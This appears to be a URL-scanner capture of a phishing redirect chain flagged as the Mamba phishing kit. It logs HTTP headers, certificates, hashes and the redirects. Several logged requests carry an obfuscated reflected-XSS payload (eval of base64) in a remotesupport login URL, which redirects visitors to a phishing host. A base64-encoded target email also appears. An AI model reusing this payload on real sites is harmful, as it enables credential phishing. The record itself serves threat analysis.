User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 111865
Origin: https://taxexpertscan.com
DNT: 1
Connection: keep-alive
Referer: https://taxexpertscan.com/s/?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20=
Cookie: _cid=79a110db5e803c22ede226733ed72029
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Pragma: no-cache
Cache-Control: no-cache
HTTP/2 301 Moved Permanently
cache-control: no-store
location: https://google.com/404/
content-length: 0
content-type: text/html; charset=UTF-8
date: Fri, 30 May 2025 16:18:37 GMT
server: Apache
X-Firefox-Spdy: h2
GET www.google.com/images/errors/robot.png
142.250.178.100200 OK 6.3 kB URL GET www.google.com/images/errors/robot.png
IP 142.250.178.100:443
Certificate IssuerGoogle Trust Services
Subjectwww.google.com
Fingerprint84:BD:0D:9A:51:CC:86:3E:E9:2F:6E:7C:2D:58:AC:4C:FB:B5:3D:8C
ValidityMon, 12 May 2025 08:44:44 GMT - Mon, 04 Aug 2025 08:44:43 GMT
File type PNG image data, 171 x 213, 8-bit colormap, non-interlaced
Hash 4c9acf280b47cef7def3fc91a34c7ffe
c32bb847daf52117ab93b723d7c57d8b1e75d36b
5f9fc5b3fbddf0e72c5c56cdcfc81c6e10c617d70b1b93fbe1e4679a8797bff7
GET /images/errors/robot.png HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: keep-alive
Cookie: SOCS=CAESHAgBEhJnd3NfMjAyMjA5MjktMF9SQzEaAnJvIAEaBgiAkvOZBg
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-site
Pragma: no-cache
Cache-Control: no-cache
HTTP/2 200 OK
accept-ranges: bytes
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy-report-only: same-origin; report-to="static-on-bigtable"
report-to: {"group":"static-on-bigtable","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/static-on-bigtable"}]}
content-length: 6327
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Mon, 26 May 2025 13:16:54 GMT
expires: Tue, 26 May 2026 13:16:54 GMT
cache-control: public, max-age=31536000
age: 356504
last-modified: Tue, 22 Oct 2019 18:30:00 GMT
content-type: image/png
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
X-Firefox-Spdy: h2
GET taxexpertscan.com/s?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20=
162.241.27.245301 Moved Permanently 2.9 kB URL User Request GET taxexpertscan.com/s?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20=
IP 162.241.27.245:443
ASN #46606 UNIFIEDLAYER-AS-1
Certificate IssuerLet's Encrypt
Subject*.taxexpertscan.com
Fingerprint95:55:5D:00:2A:0A:9B:19:DC:68:BA:3D:33:E0:C4:54:8D:1E:35:64
ValidityMon, 31 Mar 2025 09:35:35 GMT - Sun, 29 Jun 2025 09:35:34 GMT
Hash d41d8cd98f00b204e9800998ecf8427e
da39a3ee5e6b4b0d3255bfef95601890afd80709
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
Analyzer Verdict Alert urlquery phishing Phishing - Mamba Phishing Kit
OpenPhish phishing Generic/Spear Phishing
GET /s?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20= HTTP/1.1
Host: taxexpertscan.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: keep-alive
Referer: http://accounting-portal.bchsaa.org/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Pragma: no-cache
Cache-Control: no-cache
HTTP/2 301 Moved Permanently
location: https://taxexpertscan.com/s/?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20=
content-length: 347
content-type: text/html; charset=iso-8859-1
date: Fri, 30 May 2025 16:18:35 GMT
server: Apache
X-Firefox-Spdy: h2
GET remotesupport.level8tech.net/appliance/content/noframe.js
50.199.20.75200 OK 351 B URL GET remotesupport.level8tech.net/appliance/content/noframe.js
IP 50.199.20.75:443
Requested by https://remotesupport.level8tech.net/appliance/login?login[password]=test%22/%3E%3Cscript%3Evar%20addt=%20%22?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20=%22;eval(atob(%27ZG9jdW1lbnQuZG9jdW1lbnRFbGVtZW50LnN0eWxlLmRpc3BsYXkgPSAnbm9uZSc7d2luZG93LmxvY2F0aW9uLmhyZWYgPSAgJ2h0dHA6Ly9hY2NvdW50aW5nLXBvcnRhbC5iY2hzYWEub3JnL3F2OTc3SCcrYWRkdDsg%27));%3C/script%3E%3E&login[use_curr]=1&login[submit]=Change%20Password
Certificate IssuerLet's Encrypt
Subjectremotesupport.level8tech.net
Fingerprint24:67:E2:4F:FD:F5:DC:D6:73:20:36:A4:42:DA:38:2A:5D:06:08:DC
ValidityWed, 23 Apr 2025 06:03:35 GMT - Tue, 22 Jul 2025 06:03:34 GMT
Hash f2d9ee5baf1c6eb231e24779e00dfd39
640185165c936d7f92ffc640f866c19e4ccce073
70852aaa7a34cdda9d1f7cc1f41bb35f9cfa2a1dce0c22c93f5154aa7f5d8fe1
GET /appliance/content/noframe.js HTTP/1.1
Host: remotesupport.level8tech.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: keep-alive
Referer: https://remotesupport.level8tech.net/appliance/login?login[password]=test%22/%3E%3Cscript%3Evar%20addt=%20%22?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20=%22;eval(atob(%27ZG9jdW1lbnQuZG9jdW1lbnRFbGVtZW50LnN0eWxlLmRpc3BsYXkgPSAnbm9uZSc7d2luZG93LmxvY2F0aW9uLmhyZWYgPSAgJ2h0dHA6Ly9hY2NvdW50aW5nLXBvcnRhbC5iY2hzYWEub3JnL3F2OTc3SCcrYWRkdDsg%27));%3C/script%3E%3E&login[use_curr]=1&login[submit]=Change%20Password
Cookie: nsbase_session=a19b9b466109f3c5cebbfd1cfd1ebca8; warnings=1614121869
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 30 May 2025 16:18:30 GMT
Server: Apache
Strict-Transport-Security: max-age=31536000
Vary: X-Requested-With,Accept-Encoding
Last-Modified: Tue, 23 Feb 2021 23:11:09 GMT
ETag: "15f-5bc0908a03d40-gzip"
Accept-Ranges: bytes
Content-Encoding: gzip
X-UA-Compatible: IE=edge
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 235
Content-Type: application/javascript
GET remotesupport.level8tech.net/appliance/content/prototype.js
50.199.20.75200 OK 163 kB URL GET remotesupport.level8tech.net/appliance/content/prototype.js
IP 50.199.20.75:443
Requested by https://remotesupport.level8tech.net/appliance/login?login[password]=test%22/%3E%3Cscript%3Evar%20addt=%20%22?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20=%22;eval(atob(%27ZG9jdW1lbnQuZG9jdW1lbnRFbGVtZW50LnN0eWxlLmRpc3BsYXkgPSAnbm9uZSc7d2luZG93LmxvY2F0aW9uLmhyZWYgPSAgJ2h0dHA6Ly9hY2NvdW50aW5nLXBvcnRhbC5iY2hzYWEub3JnL3F2OTc3SCcrYWRkdDsg%27));%3C/script%3E%3E&login[use_curr]=1&login[submit]=Change%20Password
Certificate IssuerLet's Encrypt
Subjectremotesupport.level8tech.net
Fingerprint24:67:E2:4F:FD:F5:DC:D6:73:20:36:A4:42:DA:38:2A:5D:06:08:DC
ValidityWed, 23 Apr 2025 06:03:35 GMT - Tue, 22 Jul 2025 06:03:34 GMT
File type JavaScript source, ASCII text
Size 163 kB (163313 bytes)
Hash 3b4b13dad33b475e11feb26fd3468ecc
3d542e33a9f3eb3cb45e06fe93d08dd4b7490496
dedea3aa22a087b3745c9635e7a3d65e772d57ce590b541a6a32069a0b1d60b9
GET /appliance/content/prototype.js HTTP/1.1
Host: remotesupport.level8tech.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: keep-alive
Referer: https://remotesupport.level8tech.net/appliance/login?login[password]=test%22/%3E%3Cscript%3Evar%20addt=%20%22?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20=%22;eval(atob(%27ZG9jdW1lbnQuZG9jdW1lbnRFbGVtZW50LnN0eWxlLmRpc3BsYXkgPSAnbm9uZSc7d2luZG93LmxvY2F0aW9uLmhyZWYgPSAgJ2h0dHA6Ly9hY2NvdW50aW5nLXBvcnRhbC5iY2hzYWEub3JnL3F2OTc3SCcrYWRkdDsg%27));%3C/script%3E%3E&login[use_curr]=1&login[submit]=Change%20Password
Cookie: nsbase_session=a19b9b466109f3c5cebbfd1cfd1ebca8; warnings=1614121869
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 30 May 2025 16:18:30 GMT
Server: Apache
Strict-Transport-Security: max-age=31536000
Vary: X-Requested-With,Accept-Encoding
Last-Modified: Tue, 23 Feb 2021 23:11:09 GMT
ETag: "27df1-5bc0908a03d40-gzip"
Accept-Ranges: bytes
Content-Encoding: gzip
X-UA-Compatible: IE=edge
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 37405
Content-Type: application/javascript
GET remotesupport.level8tech.net/appliance/login?login[password]=test%22/%3E%3Cscript%3Evar%20addt=%20%22?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20=%22;eval(atob(%27ZG9jdW1lbnQuZG9jdW1lbnRFbGVtZW50LnN0eWxlLmRpc3BsYXkgPSAnbm9uZSc7d2luZG93LmxvY2F0aW9uLmhyZWYgPSAgJ2h0dHA6Ly9hY2NvdW50aW5nLXBvcnRhbC5iY2hzYWEub3JnL3F2OTc3SCcrYWRkdDsg%27));%3C/script%3E%3E&login[use_curr]=1&login[submit]=Change%20Password
50.199.20.75200 OK 3.5 kB URL User Request GET remotesupport.level8tech.net/appliance/login?login[password]=test%22/%3E%3Cscript%3Evar%20addt=%20%22?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20=%22;eval(atob(%27ZG9jdW1lbnQuZG9jdW1lbnRFbGVtZW50LnN0eWxlLmRpc3BsYXkgPSAnbm9uZSc7d2luZG93LmxvY2F0aW9uLmhyZWYgPSAgJ2h0dHA6Ly9hY2NvdW50aW5nLXBvcnRhbC5iY2hzYWEub3JnL3F2OTc3SCcrYWRkdDsg%27));%3C/script%3E%3E&login[use_curr]=1&login[submit]=Change%20Password
IP 50.199.20.75:443
Certificate IssuerLet's Encrypt
Subjectremotesupport.level8tech.net
Fingerprint24:67:E2:4F:FD:F5:DC:D6:73:20:36:A4:42:DA:38:2A:5D:06:08:DC
ValidityWed, 23 Apr 2025 06:03:35 GMT - Tue, 22 Jul 2025 06:03:34 GMT
File type HTML document, Unicode text, UTF-8 text, with very long lines (387)
Hash 40464f8c10e459f99ac4f936d2e5a563
fda2ad081f0638027e128dbcfd69f40527826e1f
ae08fe17acf5dd54375afa67f12df6cec7e53ac20e51a46e8ccffbd5f5fa2f50
GET /appliance/login?login[password]=test%22/%3E%3Cscript%3Evar%20addt=%20%22?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20=%22;eval(atob(%27ZG9jdW1lbnQuZG9jdW1lbnRFbGVtZW50LnN0eWxlLmRpc3BsYXkgPSAnbm9uZSc7d2luZG93LmxvY2F0aW9uLmhyZWYgPSAgJ2h0dHA6Ly9hY2NvdW50aW5nLXBvcnRhbC5iY2hzYWEub3JnL3F2OTc3SCcrYWRkdDsg%27));%3C/script%3E%3E&login[use_curr]=1&login[submit]=Change%20Password HTTP/1.1
Host: remotesupport.level8tech.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Upgrade-Insecure-Requests: 1
Connection: keep-alive
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 30 May 2025 16:18:29 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: SAMEORIGIN
Content-Encoding: gzip
Vary: Accept-Encoding,X-Requested-With
Set-Cookie: nsbase_session=a19b9b466109f3c5cebbfd1cfd1ebca8; path=/appliance/; secure; HttpOnly
warnings=1614121869; expires=Fri, 06-Jun-2025 16:18:29 GMT; Max-Age=604800; path=/appliance/
Strict-Transport-Security: max-age=31536000
X-UA-Compatible: IE=edge
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Feature-Policy: accelerometer 'none'; ambient-light-sensor 'none'; autoplay 'none'; camera 'none'; encrypted-media 'none'; fullscreen 'self'; geolocation 'none'; gyroscope 'none'; magnetometer 'none'; microphone 'none'; midi 'none'; payment 'none'; picture-in-picture 'none'; speaker 'none'; sync-xhr 'none'; usb 'none'; vr 'none'
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8